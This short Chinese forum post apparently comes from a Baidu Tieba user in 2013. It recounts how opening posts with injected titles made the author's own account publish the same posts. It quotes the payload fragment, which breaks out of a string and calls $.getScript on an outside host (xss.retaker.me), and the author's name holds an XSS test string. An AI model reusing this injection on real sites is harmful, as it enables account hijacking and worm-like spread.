在贴吧被csrf了

liyang (<script>alert("xss")</script>) | 2013-05-19 17:31

Unnamed QQ Screenshot20130519172904.png

点进来有..",a:$.getScript('//xss.retaker.me/1.js'),a:"

题目都是这样的

本来以为是某个人测试的呢  点开想回复一个  我的cookies到你那了么

结果就发现自己的账号也发出了相似的帖子。。。